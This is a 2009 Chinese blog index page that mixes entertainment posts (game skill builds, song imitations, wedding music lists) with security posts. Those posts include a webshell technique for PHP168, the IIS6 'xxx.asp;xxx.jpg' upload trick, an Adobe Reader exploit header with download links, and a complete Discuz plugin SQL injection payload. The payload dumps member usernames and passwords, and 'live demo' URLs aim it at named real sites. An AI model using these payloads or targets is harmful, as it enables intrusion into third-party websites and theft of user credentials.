爆笑视频:这哥们一看从小就没爬过树

2009年9月11日 2 条评论 122 views

分类: 影音娱乐 标签:

PHP168 6.0及以下版本0day

2009年9月9日 没有评论 154 views

影响版本:PHP168 6.0以下版本

入侵者可以在用户登陆页面构造特殊语句,将PHP一句话写入cache目录,从而获得使用PHP168整站程序网站的WEBSHELL权限。

测试语句:
阅读全文...

分类: 技术文章 标签: ,

内存扫描及编辑

2009年9月8日 没有评论 152 views

内存扫描及编辑
详细代码如下:
阅读全文...

分类: 技术文章 标签:

DNF狂战士(红眼)刷图加点以及升级路线

2009年9月8日 1 条评论 131 views

单修武器单暴刷图加点篇

  【开始】

  波动

  裂波斩LV1:为遗迹的火骑士专门设计的神技,+1足够,如果对遗迹操作很好可以不加。

  武器技

  上挑+10出强制:上挑是力量相关技能,满了后的击飞高度和攻击都有很大提高。(很多人说+5出强制。说太可以无限XX+上挑,我想说,在暴走的状态下,穿怒0,拿巨。我同样可以XX+上挑把老鼠BOSS挑到出保护。)

  三段斩+1:跑位,扫地,逃跑,追击,风骚!

  【巨剑精通】或者【太刀精通】+10:喜欢+巨剑的+巨剑「巨刀重攻击与范围」. 喜欢太刀的太刀.(太刀重速度.主要因为流星落的缘故)

  血气

  十字斩+20出强制:刷图的最常用也是主要输出技能(必满)

  抓头+20出强制:做为SP最丰富的纯刷图流狂战,无理由满!

  崩山击+5出强制:因为有双刀支持着十字斩,所以放弃了这个技能,如今的版本LV5足够,对崩山有特殊爱好的,请5无视出强制这句话。

  暴走+10: 红眼招牌技能之一(不做解释)

  血气唤醒+10:血越少越兴奋,这是作为一个红眼最基本的知识!
阅读全文...

分类: 影音娱乐 标签: ,

IIS6解析漏洞

2009年9月8日 没有评论 252 views

上传图片未改名的情况下可以利用。
然后把马儿更名为xxx.asp;xxx.jpg或者xxx.php;xxx.jpg也行的通,上传后直接会以asp/php等可执行文件格式打开
如下图:
阅读全文...

分类: 技术文章 标签: ,

超强模仿!绝对震撼:一MM模仿N多明星合唱《千里之外》

2009年9月7日 没有评论 130 views

女声模仿的声音绝对逼真,男声模仿的就一般般了

模仿的有:孙燕姿,莫文蔚,Selina,李纹,王菲,李宇春,许如芸,刘德华,张学友,蔡琴,王杰,张宇,宋祖英,张惠妹,很强悍的人!

歌手顺序:孙燕姿 莫文蔚 SHE 李玟 王菲 李宇春 许如芸 刘德华 张学友 蔡琴 王杰 张宇 宋祖英 张惠妹
-----------------------------------------------
孙燕姿演唱:屋檐如悬崖风铃如沧海我等燕归来,时间被安排演一场意外你悄然走开,故事在城外浓雾散不开看不清对白
莫文蔚演唱:故事在城外浓雾散不开看不清对白,你听不出来风声不存在是我在感慨
Selina: 梦醒来是谁在窗台把结局打开>>李玟: 那薄如蝉翼的未来经不起谁来拆
王菲演唱:我送你离开千里之外你无声黑白,沉默年代或许不该太遥远的相爱
李宇春演唱:我送你离开天涯之外你是否还在
许如芸:琴声何来生死难猜用一生去等待
伴唱:>>闻泪声入林寻梨花白只得一行青苔 天在山之外雨落花台我两鬓斑白 闻泪声入林寻梨花白只得一行青苔 天在山之外雨落花台我等你来
刘德华演唱:一身琉璃白透明着尘埃你无瑕的爱,你从雨中来诗化了悲哀我淋湿现在
张学友演唱:芙蓉水面采船行影犹在你却不回来,被岁月覆盖你说的花开过去成空白
蔡琴演唱:梦醒来是谁在窗台把结局打开,那薄如蝉翼的未来经不起谁来拆
王杰演唱:我送你离开千里之外你无声黑白,沉默年代或许不该太遥远的相爱
张宇: 我送你离开天涯之外你是否还在 琴声何来生死难猜用一生...
宋祖英:我送你离开千里之外你无声黑白 沉默年代或许不该太遥远的相爱
张惠妹:我送你离开天涯之外你是否还在 琴声何来生死难猜用一生去等待
----------------------------------------------------
阅读全文...

分类: 影音娱乐 标签:

用iptables来防止web服务器被CC攻击

2009年9月6日 没有评论 147 views

当apache站点受到严重的cc攻击,我们可以用iptables来防止web服务器被CC攻击,实现自动屏蔽IP的功能。

1.系统要求

(1)LINUX 内核版本:2.6.9-42ELsmp或2.6.9-55ELsmp(其它内核版本需要重新编译内核,比较麻烦,但是也是可以实现的)。

(2)iptables版本:1.3.7

2. 安装

安装iptables1.3.7和系统内核版本对应的内核模块kernel-smp-modules-connlimit

3. 配置相应的iptables规则

示例如下:
阅读全文...

分类: 技术文章 标签: , ,

Adobe Acrobat/Reader < 7.1.1/8.1.3/9.1 Collab getIcon Universal Exploit

2009年9月4日 没有评论 123 views

#!/usr/bin/env python
#
# *** Acrobat Reader - Collab getIcon universal exploiter ***
# evil_pdf.py, tested on Operating Systems:
# Windows XP SP3 English/French
# Windows 2003 SP2 English
# with Application versions:
# Adobe Reader 9.0.0/8.1.2 English/French
# Test methods:
# Standalone PDF, embedded PDF in Firefox 3.0.13 and Internet Explorer 7
# 24/06/2009 - Created by Ivan Rodriguez Almuina (kralor). All rights reserved.
# [Coromputer] raised from the ashes.
#

http://www.coromputer.net/CVE-2009-0927_package.zip

back: http://milw0rm.com/sploits/2009-CVE-2009-0927_package.zip

# milw0rm.com [2009-09-03]

分类: 矩阵毒刺 标签: ,

100首最流行的婚礼音乐

2009年9月4日 没有评论 85 views

开场前:

婚礼开始前是新人迎宾和来宾进场的时间,环境相对混乱和嘈杂,此时,适合以轻柔舒缓的音乐营造高雅的气氛,平静一下宾客的心境,为婚礼的开始做好铺垫。

1、《圣母颂》—舒伯特

2、《温馨的佳节》—巴赫

3、《求婚》—周华健

4、《第八号小提琴协奏曲》

5、《I swear》—Westlife

6、《喜欢你现在的样子》—黄韵玲

7、《梦中的婚礼》—钢琴曲

8、《今天你要嫁给我》—陶喆/蔡依琳

9、《爱》—蔡琴
阅读全文...

分类: 影音娱乐 标签:

让 Windows 开机自动拨号上网

2009年9月4日 2 条评论 252 views

1. 将以下代码复制、粘贴到记事本
2. 把代码中的“宽带连接”修改为你建立的的拨号网络连接的名称,账号、密码分别修改为你的 ADSL 账号和密码
3. 将代码另存为:拨号.vbs,此时双击即可实现拨号
4. 把“拨号.vbs” 拖到开始菜单的启动项里
5. 完成。

阅读全文...

分类: 矩阵毒刺 标签:

DVBBS php v2.0 boardrule.php注入漏洞

2009年9月4日 没有评论 107 views

DVBBS php v2.0 boardrule.php注入漏洞

影响版本:
DVBBS php v2.0漏洞描述:
PHP2.0++功能介绍:
一、 断点数据库备份,保持所备份的数据和论坛数据同步;
二、 多种形式Url rewrite 伪静态,提高SEO;
三、 多线程信息采集,减少人工操作繁琐度;
四、 自动升级采用多线程断点续传PHP下载模块;
五、 国际论坛界中独创了一个文件安装论坛;
六、 创新、贴心的新发贴回贴模式正在启用---动网PHP2.0++再创佳绩;
七、 发挥PHP优点,大量采用成熟的缓存机制
八、 全优的后台搜索功能;
九、 用户体验

boardrule.php存在sql注入漏洞。
测试方法:

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
阅读全文...

分类: 技术文章 标签: , ,

Discuz! Plugin JiangHu <= 1.1 Sql injection Vulnerability

2009年9月4日 没有评论 67 views

=========================================================
Discuz! Plugin JiangHu < = 1.1 Sql injection Vulnerability
=========================================================

========================[Author]=========================

[+] Founded : ZhaoHuAn
[+] Contact : ZhengXing[at]shandagames[dot]com
[+] Blog : http://www.patching.net/zhaohuan/
[+] Date : Feb, 9th 2009
[+] Update : Sep, 1th 2009

========================[Soft Info]======================

Software: Discuz! Plugin JiangHu Inn
Version : 1.1
Vendor : http://www.discuz.com
d0rk : inurl:forummission.php

[-] Exploit:
[+] and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--

[-] SqlI PoC:
[+] http://target/[path]/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--

[+] Demo Live:
[-] http://www.palslp.com/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--

[-] http://bbs.sunspals.com/forummission.php?index=show&id=24 and+1=2+union+select+1,2,group_concat(uid,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11 from cdb_members--

/---------------------------------------------www.zhaohuan.net-------------------------------------------------\

Greetz : Snda Security Team
& Normal is boring - -!

\--------------------------------------------------------------------------------------------------------------/

分类: 矩阵毒刺 标签: